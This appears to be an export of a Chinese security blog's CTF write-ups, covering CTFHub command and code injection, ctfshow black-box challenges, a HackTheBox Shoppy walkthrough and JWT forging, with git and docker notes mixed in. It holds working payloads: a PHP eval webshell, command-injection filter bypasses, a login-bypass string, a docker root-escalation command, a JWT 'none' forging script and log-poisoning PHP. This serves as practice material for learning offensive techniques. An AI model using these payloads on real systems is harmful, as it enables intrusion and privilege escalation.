<content><![CDATA[<p>rce:远程代码执行漏洞<br>分为远程命令执行 ping 和远程代码执行 evel。<br><strong>其实这就是一个接口,可以让攻击者直接向后台服务器远程注入操作系统命令或者代码,从而控制后台系统,这就是 RCE 漏洞</strong>。相当于直接操控服务器电脑的 cmd 命令行!高危漏洞!</p>
<h2 id="eval-执行"><a href="#eval-执行" class="headerlink" title="eval 执行"></a>eval 执行</h2><figure class="highlight php"><table><tr><td class="code"><pre><span class="line"><span class="meta"><?php</span></span><br><span class="line"> <span class="keyword">if</span>(<span class="keyword">isset</span>(<span class="variable">$_REQUEST</span>[<span class="string">'cmd'</span>])){</span><br><span class="line"> <span class="keyword">eval</span>(<span class="variable">$_REQUEST</span>[<span class="string">'cmd'</span>]);</span><br><span class="line"> }</span><br><span class="line"> <span class="keyword">else</span>{</span><br><span class="line"> <span class="title function_ invoke__">highlight_file</span>(<span class="keyword">__FILE__</span>);</span><br><span class="line"> }</span><br><span class="line"><span class="meta">?></span></span><br></pre></td></tr></table></figure>
<p>传参给 cmd 来 eval</p>
<figure class="highlight php"><table><tr><td class="code"><pre><span class="line">/?cmd=<span class="title function_ invoke__">system</span>(<span class="string">"ls /"</span>);<span class="comment">//此处因为根目录无flag 所以看上一级目录</span></span><br></pre></td></tr></table></figure>
<p>找到后 再 cat /flag_****</p>
<h2 id="文件包含"><a href="#文件包含" class="headerlink" title="文件包含"></a>文件包含</h2><p>这里使用 strpos 函数</p>
<blockquote>
<p>strpos:查找字符串首次出现的位置</p>
<p>int strpos ( string $haystack , mixed $needle [, int $offset = 0 ] )</p>
</blockquote>
<p>题目使用</p>
<figure class="highlight php"><table><tr><td class="code"><pre><span class="line"><span class="keyword">if</span>(!<span class="title function_ invoke__">strpos</span>(<span class="variable">$_GET</span>[<span class="string">"file"</span>],<span class="string">"flag"</span>)){<span class="comment">//无flag字符即可运行</span></span><br><span class="line"> <span class="keyword">include</span> <span class="variable">$_GET</span>[<span class="string">"file"</span>];</span><br><span class="line">}</span><br></pre></td></tr></table></figure>
<p>来包含文件,而下方给出的 shell.txt 含有 eval 漏洞</p>
<p>于是包含它(shell.txt 没有“flag”字符 所以这里 strpos 没影响)</p>
<p><img src= "C:\Users\CNsirius\AppData\Roaming\Typora\typora-user-images\image-20220218182857507.png" alt="image-20220218182857507"></p>
<p>通过 get(包含文件) post(传参)并用来得到 flag</p>
<h2 id="php-info"><a href="#php-info" class="headerlink" title="php info"></a>php info</h2><figure class="highlight plaintext"><table><tr><td class="code"><pre><span class="line"><?php</span><br><span class="line">if (isset($_GET['file'])){</span><br><span class="line"> if ( substr($_GET["file"], 0, 6) === "php://" ) {</span><br><span class="line"> include($_GET["file"]);</span><br><span class="line"> }</span><br><span class="line"> else {</span><br><span class="line"> echo "Hacker!!!";</span><br><span class="line"> }}</span><br><span class="line">else {</span><br><span class="line"> highlight_file(__FILE__);}?></span><br><span class="line"><hr>i don't have shell, how to get flag? <br><a href="phpinfo.php">phpinfo</a></span><br></pre></td></tr></table></figure>
<p>点击 phpinfo 链接 可查看 php 环境</p>
<h3 id="php-input"><a href="#php-input" class="headerlink" title="php://input"></a>php://input</h3><figure class="highlight c++"><table><tr><td class="code"><pre><span class="line"><span class="comment">/*php:// — 访问各个输入/输出流(I/O streams)</span></span><br><span class="line"><span class="comment"></span></span><br><span class="line"><span class="comment">PHP 提供了一些杂项输入/输出(IO)流,允许访问 PHP 的输入输出流、标准输入输出和错误描述符, 内存中、磁盘备份的临时文件流以及可以操作其他读取写入文件资源的过滤器。</span></span><br><span class="line"><span class="comment"></span></span><br><span class="line"><span class="comment">php://input是个可以访问请求的原始数据的只读流。</span></span><br></pre></td></tr></table></figure>
<p><img src= "C:\Users\CNsirius\AppData\Roaming\Typora\typora-user-images\image-20220218162728184.png" alt="image-20220218162728184"></p>
<h2 id="读取源代码"><a href="#读取源代码" class="headerlink" title="读取源代码"></a>读取源代码</h2><p>看环境 无法使用 php://input</p>
<figure class="highlight shell"><table><tr><td class="code"><pre><span class="line"><?php</span><br><span class="line">error_reporting(E_ALL);</span><br><span class="line">if (isset($_GET['file'])) {</span><br><span class="line"> if ( substr($_GET["file"], 0, 6) === "php://" ) {</span><br><span class="line"> include($_GET["file"]);</span><br><span class="line"> } else {</span><br><span class="line"> echo "Hacker!!!";</span><br><span class="line"> }</span><br><span class="line">} else {</span><br><span class="line"> highlight_file(__FILE__);</span><br><span class="line">}</span><br><span class="line">?></span><br></pre></td></tr></table></figure>
<p>但还必须是 php://开头</p>
<h3 id="php-filter"><a href="#php-filter" class="headerlink" title="php://filter"></a><a href="https://www.php.net/manual/zh/wrappers.php.php">php://filter</a></h3><p><img src= "C:\Users\CNsirius\AppData\Roaming\Typora\typora-user-images\image-20220219174206504.png" alt="image-20220219174206504"></p>
<p><img src= "C:\Users\CNsirius\AppData\Roaming\Typora\typora-user-images\image-20220219112308277.png" alt="image-20220219112308277"></p>
<h2 id="远程包含"><a href="#远程包含" class="headerlink" title="远程包含"></a>远程包含</h2><p>同 phpinfo 做法相同</p>
<h2 id="命令注入"><a href="#命令注入" class="headerlink" title="命令注入"></a>命令注入</h2><p>输入命令</p>
<figure class="highlight shell"><table><tr><td class="code"><pre><span class="line">127.0.0.1;ls</span><br></pre></td></tr></table></figure>
<p>然后 cat 时出现了问题</p>
<p>输出被限制了</p>
<p>于是用管道符号来限制输出 base64</p>
<p>得到后再解码</p>
<p><img src= "C:\Users\CNsirius\AppData\Roaming\Typora\typora-user-images\image-20220218170811553.png" alt="image-20220218170811553"></p>
<h2 id="过滤-cat"><a href="#过滤-cat" class="headerlink" title="过滤 cat"></a>过滤 cat</h2><figure class="highlight plaintext"><table><tr><td class="code"><pre><span class="line"><?php</span><br><span class="line">$res = FALSE;</span><br><span class="line">if (isset($_GET['ip']) && $_GET['ip']) {</span><br><span class="line"> $ip = $_GET['ip'];</span><br><span class="line"> $m = [];</span><br><span class="line"> if (!preg_match_all("/cat/", $ip, $m)) {//过滤了cat</span><br><span class="line"> $cmd = "ping -c 4 {$ip}";</span><br><span class="line"> exec($cmd, $res);</span><br><span class="line"> }</span><br><span class="line"> else {</span><br><span class="line"> $res = $m;</span><br><span class="line"> }</span><br><span class="line">}</span><br><span class="line">?></span><br><span class="line"></span><br><span class="line"><pre></span><br><span class="line"><?php</span><br><span class="line"> if ($res) {</span><br><span class="line"> print_r($res);</span><br><span class="line"> }</span><br><span class="line">?></span><br><span class="line"></pre></span><br><span class="line"><?php</span><br><span class="line"> show_source(__FILE__);</span><br><span class="line">?></span><br><span class="line"></body></span><br><span class="line"></html></span><br></pre></td></tr></table></figure>
<h2 id="more"><a href="#more" class="headerlink" title="more"></a>more</h2><p>Linux more 命令类似 cat ,不过会以一页一页的形式显示,更方便使用者逐页阅读,而最基本的指令就是按空白键(space)就往下一页显示,按 b 键就会往回(back)一页显示,而且还有搜寻字串的功能(与 vi 相似),使用中的说明文件,请按 h 。</p>
<figure class="highlight ini"><table><tr><td class="code"><pre><span class="line">more <span class="section">[-dlfpcsu]</span> <span class="section">[-num]</span> <span class="section">[+/pattern]</span> <span class="section">[+linenum]</span> <span class="section">[fileNames..]</span></span><br></pre></td></tr></table></figure>
<p><img src= "C:\Users\CNsirius\AppData\Roaming\Typora\typora-user-images\image-20220218171602745.png" alt="image-20220218171602745"></p>
<h2 id="过滤空格"><a href="#过滤空格" class="headerlink" title="过滤空格"></a>过滤空格</h2><p>在 linux 里空格可用< 或 ${IFS}代替</p>
<p><img src= "C:\Users\CNsirius\AppData\Roaming\Typora\typora-user-images\image-20220218171910282.png" alt="image-20220218171910282"></p>
<h2 id="过滤运算符"><a href="#过滤运算符" class="headerlink" title="过滤运算符"></a>过滤运算符</h2><p>cat [file]|base64 还可以用 base64 [file]</p>
<figure class="highlight plaintext"><table><tr><td class="code"><pre><span class="line"><?php</span><br><span class="line">$res = FALSE;</span><br><span class="line">if (isset($_GET['ip']) && $_GET['ip']) {</span><br><span class="line"> $ip = $_GET['ip'];</span><br><span class="line"> $m = [];</span><br><span class="line"> if (!preg_match_all("/(\||\&)/", $ip, $m)) {</span><br><span class="line"> $cmd = "ping -c 4 {$ip}";</span><br><span class="line"> exec($cmd, $res);</span><br><span class="line"> } else {</span><br><span class="line"> $res = $m;</span><br><span class="line"> }</span><br><span class="line">}</span><br><span class="line">?></span><br></pre></td></tr></table></figure>
<p><img src= "C:\Users\CNsirius\AppData\Roaming\Typora\typora-user-images\image-20220219104650896.png" alt="image-20220219104650896"></p>
<h2 id="综合练习"><a href="#综合练习" class="headerlink" title="综合练习"></a>综合练习</h2><figure class="highlight php"><table><tr><td class="code"><pre><span class="line">!<span class="title function_ invoke__">preg_match_all</span>(<span class="string">"/(\||&|;| |\/|cat|flag|ctfhub)/"</span>, <span class="variable">$ip</span></span><br></pre></td></tr></table></figure>
<p>;可以用%0a(url 编码) cat 用 base64 flag 用正则 f*** *lag 等 空格用 ${IFS}</p>
<p><img src= "C:\Users\CNsirius\AppData\Roaming\Typora\typora-user-images\image-20220219105932534.png" alt="image-20220219105932534"></p>
<p><img src= "C:\Users\CNsirius\AppData\Roaming\Typora\typora-user-images\image-20220219110644693.png" alt="image-20220219110644693"><img src= "C:\Users\CNsirius\AppData\Roaming\Typora\typora-user-images\image-20220219110736333.png" alt="image-20220219110736333"></p>
]]></content>
<categories>
<category>web</category>
</categories>
<tags>
<tag>web</tag>
<tag>ctfhub</tag>
<tag>rce</tag>
</tags>
</entry>
<entry>
<title>ctfshow黑盒测试</title>
<url>/2023/07/ctfshow%E9%BB%91%E7%9B%92%E6%B5%8B%E8%AF%95/</url>
<content><![CDATA[<h2 id="web380"><a href="#web380" class="headerlink" title="web380"></a>web380</h2><p>先看源码没发现啥</p>
<p>然后再点点看看功能</p>
<p>发现文章页的格式为</p>
<p><code>page_n.php</code></p>
<p>猜测为 sql 注入</p>
<p>直接在 n 处注入无效</p>
<p>尝试<code>?id=</code>处注入</p>
<p>发现报错</p>
<p><code>file_get_contents(1'.php)</code></p>
<p><img src= "/img/image-20221018212038190.png" alt="image-20221018212038190"></p>
<p>直接读取 flag<code>?id=flag</code></p>
<p>flag 出现</p>
<h2 id="web381"><a href="#web381" class="headerlink" title="web381"></a>web381</h2><p>再次尝试上题思路,发现无回显</p>
<p>再次翻看源码</p>
<p>发现到 css 文件中出现了一个特殊地址</p>
<p><img src= "/img/image-20221018212406542.png" alt="image-20221018212406542"></p>
<p>尝试打开,之后回退文件地址</p>
<p>直到退至/alsckdfy/出现 flag</p>
<blockquote>
<p>一些文件的调用可能会来自某些特殊的地址</p>
<p>如本题中后台和前站共用同一个 css 文件</p>
<p>其他如通过 cdn、图床等溯源回网上仓库(github 等)</p>
<p>即可查到源码,或找到后台等特殊地址</p>
</blockquote>
<h2 id="web382-383"><a href="#web382-383" class="headerlink" title="web382-383"></a>web382-383</h2><p>继续访问上题出现的后台地址</p>
<p>发现出现了个后台登陆界面</p>
<p>既然难度是梯度上升</p>
<p>可以考虑弱密码或者万能密码</p>
<p>进入</p>
<p>flag get√</p>
<h2 id="web384"><a href="#web384" class="headerlink" title="web384"></a>web384</h2><blockquote>
<p>hint:密码前 2 位是小写字母,后三位是数字</p>
</blockquote>
<p>再次进入后台登录页面</p>
<p>用户名肯定是 admin</p>
<p>然后就是爆破密码</p>
<p>方法一:写个脚本生成密码字典</p>
<p>方法二:使用 burp 爆破时</p>
<p>将 password 设为两个变量</p>
<p><img src= "/img/image-20221019153048062.png" alt="image-20221019153048062"></p>
<p>$1 设置成小写字母长度:2</p>
<p><img src= "/img/image-20221019153017681.png" alt="image-20221019153017681"></p>
<p>$2 设置成 3 位数字</p>
<p><img src= "/img/image-20221019153029106.png" alt="image-20221019153029106"></p>
<p><code>password=xy123</code></p>
<h2 id="web385"><a href="#web385" class="headerlink" title="web385"></a>web385</h2><p>登陆界面进不去</p>
<p>扫目录</p>
<p>发现有 install 没删</p>
<p>重置管理员密码</p>
<p><img src= "/img/image-20221028144108992.png" alt="image-20221028144108992"></p>
<blockquote>
<p>一些网页模板的安装通常通过/install 目录进行安装</p>
<p>部分开发人员忘记删除 install 等目录就会暴露出一些特殊的功能点</p>
<p>如重置密码功能点</p>
<p>模板名、版本号、配置信息等敏感信息</p>
</blockquote>
<p>重置后密码为 admin888</p>
<h2 id="web386"><a href="#web386" class="headerlink" title="web386"></a>web386</h2><p>再次访问 install 发现有个 lock.bat 给锁定住了</p>
<p><img src= "/img/image-20221028151039705.png" alt="image-20221028151039705"></p>
<p>最开始几道题是前端用了后端文件</p>
<p>这题回去访问前端的同名文件 即本来应该调用的前端页面</p>
<p>发现第一行注释</p>
<p><img src= "/img/image-20221028150737179.png" alt="image-20221028150737179"></p>
<p>访问 clear :“清理成功”</p>
<p>回想到,install 里的 lock,直接删</p>
<p><code>clear.php?file=./install/lock.dat</code></p>
<p>这次访问 install 能重置了</p>
<p><img src= "/img/image-20221028151345438.png" alt="image-20221028151345438"></p>
<p>返回后台登录初始账户</p>
<h2 id="387"><a href="#387" class="headerlink" title="387"></a>387</h2><p>发现 robots</p>
<p><img src= "/img/image-20221028151846193.png" alt="image-20221028151846193"></p>
<p>提示 debug,访问</p>
<p>提示 file 不存在</p>
<p>尝试 get 进去个 file</p>
<p><img src= "/img/image-20221028152040695.png" alt="image-20221028152040695"></p>
<p><img src= "/img/image-20221028152143283.png" alt="image-20221028152143283"></p>
<p>使用 log 执行命令将 lock 删除</p>
<p><code><?php unlink('/var/www/html/install/lock.dat');?></code></p>
<p><img src= "/img/image-20221028155008033.png" alt="image-20221028155008033"></p>
<p>还有种执行方式是将命令通过读取文件显示回显</p>
<p><code><?php system('==shell== > /var/www/html/1.txt');?></code></p>
]]></content>
<categories>
<category>web</category>
</categories>
<tags>
<tag>web</tag>
<tag>ctfshow</tag>
</tags>
</entry>
<entry>
<title>git命令</title>
<url>/2023/07/git/</url>
<content><![CDATA[<h2 id="创建仓库命令"><a href="#创建仓库命令" class="headerlink" title="创建仓库命令"></a>创建仓库命令</h2><h3 id="init"><a href="#init" class="headerlink" title="init"></a>init</h3><p>git init 命令用于在目录中创建新的 Git 仓库。<br>在文件夹中,会被创建出一个.git 的一个隐藏文件,这时,本地库已经初始化完成.</p>
<h3 id="clone"><a href="#clone" class="headerlink" title="clone"></a>clone</h3><p>git clone 拷贝一个 Git 仓库到本地,让自己能够查看该项目,或者进行修改。<br>拷贝项目命令格式如下:</p>
<figure class="highlight shell"><table><tr><td class="code"><pre><span class="line">git clone [url]</span><br></pre></td></tr></table></figure>
<h2 id="提交与修改"><a href="#提交与修改" class="headerlink" title="提交与修改"></a>提交与修改</h2><h3 id="add"><a href="#add" class="headerlink" title="add"></a>add</h3><p>git add 命令可将该文件添加到暂存区。</p>
<p>添加一个或多个文件到暂存区</p>
<h3 id="commit"><a href="#commit" class="headerlink" title="commit"></a>commit</h3><p>git commit 命令将暂存区内容添加到本地仓库中。<br>提交暂存区到本地仓库中:</p>
<figure class="highlight shell"><table><tr><td class="code"><pre><span class="line">git commit -m [message]</span><br></pre></td></tr></table></figure>
<p>[message] 可以是一些备注信息。</p>
<h3 id="status"><a href="#status" class="headerlink" title="status"></a>status</h3><p>git status 命令用于查看在你上次提交之后是否有对文件进行再次修改。</p>
<h3 id="rm"><a href="#rm" class="headerlink" title="rm"></a>rm</h3><p>git rm 命令用于删除文件。<br>如果只是简单地从工作目录中手工删除文件,运行 git status 时就会在 Changes not staged for commit 的提示。</p>
<h3 id="mv"><a href="#mv" class="headerlink" title="mv"></a>mv</h3><p>git mv 命令用于移动或重命名一个文件、目录或软连接。</p>
<figure class="highlight shell"><table><tr><td class="code"><pre><span class="line">git mv [file] [newfile]</span><br></pre></td></tr></table></figure>
<p>如果新文件名已经存在,但还是要重命名它,可以使用 -f 参数:</p>
<figure class="highlight shell"><table><tr><td class="code"><pre><span class="line">git mv -f [file] [newfile]</span><br></pre></td></tr></table></figure>
<h2 id="远程操作"><a href="#远程操作" class="headerlink" title="远程操作"></a>远程操作</h2><h3 id="remote"><a href="#remote" class="headerlink" title="remote"></a>remote</h3><p>显示所有远程仓库:</p>
<figure class="highlight shell"><table><tr><td class="code"><pre><span class="line">git remote -v</span><br></pre></td></tr></table></figure>
<h3 id="pull"><a href="#pull" class="headerlink" title="pull"></a>pull</h3><p>git pull 命令用于从远程获取代码并合并本地的版本。</p>
<figure class="highlight shell"><table><tr><td class="code"><pre><span class="line">git pull <远程主机名> <远程分支名>:<本地分支名></span><br></pre></td></tr></table></figure>
<h3 id="push"><a href="#push" class="headerlink" title="push"></a>push</h3><p>git push 命用于从将本地的分支版本上传到远程并合并。</p>
<figure class="highlight shell"><table><tr><td class="code"><pre><span class="line">git push <远程主机名> <本地分支名>:<远程分支名></span><br></pre></td></tr></table></figure>
]]></content>
<categories>
<category>web</category>
</categories>
<tags>
<tag>web</tag>
<tag>git</tag>
</tags>
</entry>
<entry>
<title>hackthebox合集</title>
<url>/2023/07/htb/</url>
<content><![CDATA[<p>共做出三道题,前两道题 wp 正在补,但现在又有点想转去做 vulnhub</p>
<h2 id="easy"><a href="#easy" class="headerlink" title="easy"></a>easy</h2><h3 id="Shoppy"><a href="#Shoppy" class="headerlink" title="Shoppy"></a>Shoppy</h3><h4 id="信息收集"><a href="#信息收集" class="headerlink" title="信息收集"></a>信息收集</h4><p>老样子 先 nmap 扫下</p>
<p>有 22 和 80</p>
<p><img src= "/img/image-20221020162838813.png" alt="image-20221020162838813"></p>
<p>然后将域名加入 hosts</p>
<p>子域名扫描</p>
<p>可以使用 gobuster 或各种 fuzz 工具如 wfuzz</p>
<blockquote>
<p>本来想用 oneforall 扫子域名,试了半天一堆错误,后来问学长,oneforall 是调用了一堆子域名解析的</p>
</blockquote>
<p>扫到 mattermost.shoppy.htb 加进 hosts</p>
<p>打开发现是个登陆界面,先放着</p>
<p>跑下主站的域名 发现有个/admin</p>
<h4 id="登录"><a href="#登录" class="headerlink" title="登录"></a>登录</h4><p>根据黑盒测试老套路,试试弱口令,不成功,试试万能密码跑下</p>
<p>发现<code>admin'||''==='</code>成功进入</p>
<p>进入后发现搜索框,可进行大量尝试</p>
<p>当搜索到 admin 后出现 passwordhash</p>
<p>继续尝试后发现搜索<code>admin'||''==='</code>会出现两个 hash</p>
<p>使用 hashcat 爆破</p>
<p><code>josh:remembermethisway</code></p>
<p>然后进入之前扫到的那个子域名尝试登陆,成功</p>
<p>又是 htb 经典频道页面</p>
<p>翻找后发现</p>
<p><img src= "/img/image-20221020204113936-16662696771111.png" alt="image-20221020204113936"></p>
<p>尝试使用 ssh 连接</p>
<p>password:Sh0ppyBest@pp!</p>
<p><img src= "/img/image-20221020203942821.png" alt="image-20221020203942821"></p>
<p>user get√</p>
<h4 id="root"><a href="#root" class="headerlink" title="root"></a>root</h4><p>ssh 进入后 ls 发现已经有老哥把经典 linepeas 传进去了</p>
<p>开跑!</p>
<p>然后爆出一堆 cve 先放一边</p>
<p>还在后面看到一些 password 字段的文件去看看</p>
<p><img src= "/img/image-20221020205247703.png" alt="image-20221020205247703"></p>
<p><img src= "/img/image-20221020210747666.png" alt="image-20221020210747666"></p>
<p>password:Sample</p>
<p>调用下密码管理器</p>
<p><img src= "/img/image-20221020210823274.png" alt="image-20221020210823274"></p>
<p>再次使用 ssh 登录 deploy 账户</p>
<p>进入后又没啥思路了</p>
<p>准备走 cve 了</p>
<p>走前看了眼 wp</p>
<p>发现聊天页下面还有段话</p>
<p><img src= "/img/image-20221020211115093.png" alt="image-20221020211115093"></p>
<p>发现 docker 部署尝试 docker 提权</p>
<figure class="highlight shell"><table><tr><td class="code"><pre><span class="line">docker run -v /:/mnt --rm -it alpine chroot /mnt sh</span><br></pre></td></tr></table></figure>
<p><img src= "/img/image-20221020211249861.png" alt="image-20221020211249861"></p>
<p>其实后来想想 linpeas 里出现了提示</p>
<p><img src= "/img/image-20221020211920140.png" alt="image-20221020211920140"></p>
<p>deplay 在 root 权限的 docker 组里,当时要是细看的话应该也能想到</p>
<p>后面跟着 wp 做 cve 也懒得去试了</p>
<p>最后给师傅们留下截图</p>
<p><img src= "/img/image-20221020212137224.png" alt="image-20221020212137224"></p>
<p>这回 cve 都没用,给个简单低评吧~</p>
]]></content>
<categories>
<category>web</category>
</categories>
<tags>
<tag>web</tag>
<tag>ctfshow</tag>
</tags>
</entry>
<entry>
<title>kali安装docker</title>
<url>/2023/07/docker/</url>
<content><![CDATA[<h2 id="kali-安装-docker"><a href="#kali-安装-docker" class="headerlink" title="kali 安装 docker"></a>kali 安装 docker</h2><figure class="highlight shell"><table><tr><td class="code"><pre><span class="line">apt-get update</span><br><span class="line">apt-get install docker-engine</span><br><span class="line"><span class="meta prompt_">#</span><span class="language-bash"><span class="comment"># 安装结束,打开docker服务</span></span></span><br><span class="line">service docker start</span><br><span class="line"><span class="meta prompt_">#</span><span class="language-bash"><span class="comment"># 验证安装,运行测试样例</span></span></span><br><span class="line">docker --version</span><br><span class="line">docker run hello-world</span><br><span class="line"><span class="meta prompt_">#</span><span class="language-bash">测试</span></span><br></pre></td></tr></table></figure>
<h2 id="docker-常用命令"><a href="#docker-常用命令" class="headerlink" title="docker 常用命令"></a>docker 常用命令</h2><figure class="highlight shell"><table><tr><td class="code"><pre><span class="line">docker --version</span><br><span class="line">docker images</span><br><span class="line">docker ps -a</span><br><span class="line">docker run -d --name 123 -p 127.0.0.1:80:80 镜像名</span><br><span class="line">docker stop 123</span><br></pre></td></tr></table></figure>
<p><a href="https://www.runoob.com/docker/docker-command-manual.html">其他常用命令见菜鸟教程</a></p>
<h2 id="dockers-底层原理"><a href="#dockers-底层原理" class="headerlink" title="dockers 底层原理"></a>dockers 底层原理</h2><h3 id="Namespaces"><a href="#Namespaces" class="headerlink" title="Namespaces"></a>Namespaces</h3><blockquote>
<p>命名空间是 Linux 为我们提供的<code>用于分离进程树、网络接口、挂载点以及进程间通信等资源</code>的方法。在日常使用 Linux 时,我们并没有运行多个完全分离的服务器的需要,但是如果我们在服务器上启动了多个服务,这些服务其实会相互影响的,每一个服务都能看到其他服务的进程,也可以访问宿主机器上的任意文件,这是很多时候我们都不愿意看到的,我们更希望运行在同一台机器上的不同服务能做到完全隔离,就像运行在多台不同的机器上一样。</p>
</blockquote>
<h3 id="CGroups"><a href="#CGroups" class="headerlink" title="CGroups"></a>CGroups</h3><blockquote>
<p>我们通过 Linux 的命名空间为新创建的进程隔离了文件系统、网络并与宿主机器之间的进程相互隔离,但是命名空间并不能够为我们<code>提供物理资源上的隔离</code>,比如 CPU 或者内存,如果在同一台机器上运行了多个对彼此以及宿主机器一无所知的『容器』,这些容器却共同占用了宿主机器的物理资源。<br>如果其中的某一个容器正在执行 CPU 密集型的任务,那么就会影响其他容器中任务的性能与执行效率,导致多个容器相互影响并且抢占资源。如何对多个容器的资源使用进行限制就成了解决进程虚拟资源隔离之后的主要问题,而 Control Groups(简称 CGroups)就是能够隔离宿主机器上的物理资源,例如 CPU、内存、磁盘 I/O 和网络带宽。<br><code>在 CGroup 中,所有的任务就是一个系统的一个进程,而 CGroup 就是一组按照某种标准划分的进程,在 CGroup 这种机制中,所有的资源控制都是以 CGroup 作为单位实现的,每一个进程都可以随时加入一个 CGroup 也可以随时退出一个 CGroup。</code></p>
</blockquote>
]]></content>
<categories>
<category>web</category>
</categories>
<tags>
<tag>web</tag>
<tag>kali</tag>
<tag>docker</tag>
</tags>
</entry>
<entry>
<title>linux动态加载</title>
<url>/2023/07/linux%E5%8A%A8%E6%80%81%E5%8A%A0%E8%BD%BD/</url>
<content><![CDATA[<h3 id="linux-动态加载"><a href="#linux-动态加载" class="headerlink" title="linux 动态加载"></a>linux 动态加载</h3><h2 id="查看环境"><a href="#查看环境" class="headerlink" title="查看环境"></a>查看环境</h2><p>先给了 755<br>他自己传了 flag 等于告诉我们在哪了<br>然后限到了 644<br>不想让我们直接看</p>
<blockquote>
<p>都到这一题了权限应该不用讲了</p>
</blockquote>
<p>提示给了 shell<br>且不需要提权<br><img src= "/img/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBAQ07lpKnni7w=,size_20,color_FFFFFF,t_70,g_se,x_16-1689254104587-61.png" alt="在这里插入图片描述"><br>于是需要新学一个东西<br>动态加载</p>
<h2 id="Linux-ELF-Dynaamic-Loader"><a href="#Linux-ELF-Dynaamic-Loader" class="headerlink" title="Linux ELF Dynaamic Loader"></a>Linux ELF Dynaamic Loader</h2><h3 id="elf-文件"><a href="#elf-文件" class="headerlink" title="elf 文件"></a>elf 文件</h3><p>elf 文件是 linux 下的可执行文件<br>文件头为 elf</p>
<blockquote>
<p>不知道是靶机还是蚁剑虚拟终端的问题 没法 vi<br>直接 cat 就能看到了</p>
<p><img src= "/img/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBAQ07lpKnni7w=,size_20,color_FFFFFF,t_70,g_se,x_16-1689254108304-64.png" alt="在这里插入图片描述"></p>
</blockquote>
<h3 id="动态库链接器-加载器"><a href="#动态库链接器-加载器" class="headerlink" title="动态库链接器/加载器"></a>动态库链接器/加载器</h3><ul>
<li>当需要动态链接的应用被操作系统加载时</li>
<li>系统必须要定位然后加载它所需要的所有动态库文件</li>
<li>在 Linux 环境下,这项工作是由 ld-linux.so.2 来负责完成的</li>
<li>执行操作时操作系统会将控制权交给 ld-linux.so</li>
<li>而不是交给程序正常的进入地址</li>
<li>ld-linux.so.2 会寻找然后加载所有需要的库文件,然后再将控制权交给应用的起始入口。</li>
</ul>
<h3 id="ldd-命令"><a href="#ldd-命令" class="headerlink" title="ldd 命令"></a>ldd 命令</h3><p>使用 ldd 命令即可查看<br>简便的 shell 命令依赖哪些动态加载库<br><img src= "/img/669b04b31dd04fe1a8d320ea2540ced2.png" alt="在这里插入图片描述"><img src= "/img/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBAQ07lpKnni7w=,size_20,color_FFFFFF,t_70,g_se,x_16-1689254114578-69.png" alt="在这里插入图片描述"></p>
<h2 id="姿势"><a href="#姿势" class="headerlink" title="姿势"></a>姿势</h2><p>在 cat elf 文件时<br>看到第一行后面/lib64/ld-linux-x86-64.so.2 动态库<br>并且在 ldd<br>可以看到 ls 和 cat 动用他了<br>用!<br><img src= "/img/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBAQ07lpKnni7w=,size_20,color_FFFFFF,t_70,g_se,x_16-1689254120768-72.png" alt="在这里插入图片描述">这是他的介绍<br>执行</p>
<figure class="highlight plaintext"><table><tr><td class="code"><pre><span class="line">/lib64/ld-linux-x86-64.so.2 /readflag</span><br></pre></td></tr></table></figure>
<p>get</p>
]]></content>
<categories>
<category>web</category>
</categories>
<tags>
<tag>web</tag>
<tag>ctfhub</tag>
<tag>linux</tag>
<tag>动态加载</tag>
</tags>
</entry>
<entry>
<title>ctfhub-jwt</title>
<url>/2023/07/jwt/</url>
<content><![CDATA[<h2 id="基础知识"><a href="#基础知识" class="headerlink" title="基础知识"></a>基础知识</h2><p>题目附件:<a href="https://www.wolai.com/ctfhub/hcFRbVUSwDUD1UTrPJbkob">jwt 基础知识</a></p>
<p>flag 在下面</p>
<p>需要了解一下 jwt 组成部分</p>
<h2 id="敏感信息泄露"><a href="#敏感信息泄露" class="headerlink" title="敏感信息泄露"></a>敏感信息泄露</h2><p>随便输个</p>
<p>进去查消息头</p>
<p>然后在</p>
<p><a href="https://jwt.io/">jwt.io</a></p>
<p>decode 一共两部分 ag 是另一半<br><img src= "/img/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBAQ07lpKnni7w=,size_20,color_FFFFFF,t_70,g_se,x_16-1689254077114-40.png" alt="请添加图片描述"></p>
<h2 id="无签名"><a href="#无签名" class="headerlink" title="无签名"></a>无签名</h2><figure class="highlight python"><table><tr><td class="code"><pre><span class="line"><span class="keyword">import</span> jwt</span><br><span class="line">algorithm=<span class="string">"none"</span></span><br><span class="line">payload = {</span><br><span class="line"> <span class="string">"username"</span>: <span class="string">"admin"</span>,</span><br><span class="line"> <span class="string">"password"</span>: <span class="string">"admin"</span>,</span><br><span class="line"> <span class="string">"role"</span>:<span class="string">"admin"</span></span><br><span class="line"> }</span><br><span class="line">key = <span class="string">""</span></span><br><span class="line">encoded = jwt.encode(payload,key,algorithm)</span><br><span class="line"><span class="built_in">print</span>(encoded)</span><br></pre></td></tr></table></figure>
<p>jwt 的签名可以为无</p>
<blockquote>
<p>今天写这个脚本的时候命名为 jwt.py</p>
<p>结果报错 但是系统环境运行正常</p>
<p>才知道是文件名的事</p>
<p>import jwt 他先自己引用自己了</p>
</blockquote>
<p>抓包</p>
<p>把 cookie 里的 token 改为这脚本的运行结果</p>
<h2 id="弱密钥"><a href="#弱密钥" class="headerlink" title="弱密钥"></a>弱密钥</h2><p>需要用到<a href="https://github.com/brendan-rius/c-jwt-cracker">jwt-cracker</a></p>
<p>依次执行即可</p>
<figure class="highlight shell"><table><tr><td class="code"><pre><span class="line">git clone https://github.com/brendan-rius/c-jwt-cracker</span><br><span class="line">./c-jwt-cracker</span><br><span class="line">make</span><br><span class="line">./jwtcrack eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ1c2VybmFtZSI6IjEiLCJwYXNzd29yZCI6IjEiLCJyb2xlIjoiZ3Vlc3QifQ.w4i8KWRWmY_xTYtRnFZnp5vLIxPG2abCly6lW6QxTKs</span><br></pre></td></tr></table></figure>
<p>然后得出该 jwt 密钥</p>
<p>然后放之前那个网站</p>
<p>改 role 为 admin</p>
<p><img src= "/img/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBAQ07lpKnni7w=,size_20,color_FFFFFF,t_70,g_se,x_16-1689254081515-43.png" alt="请添加图片描述"></p>
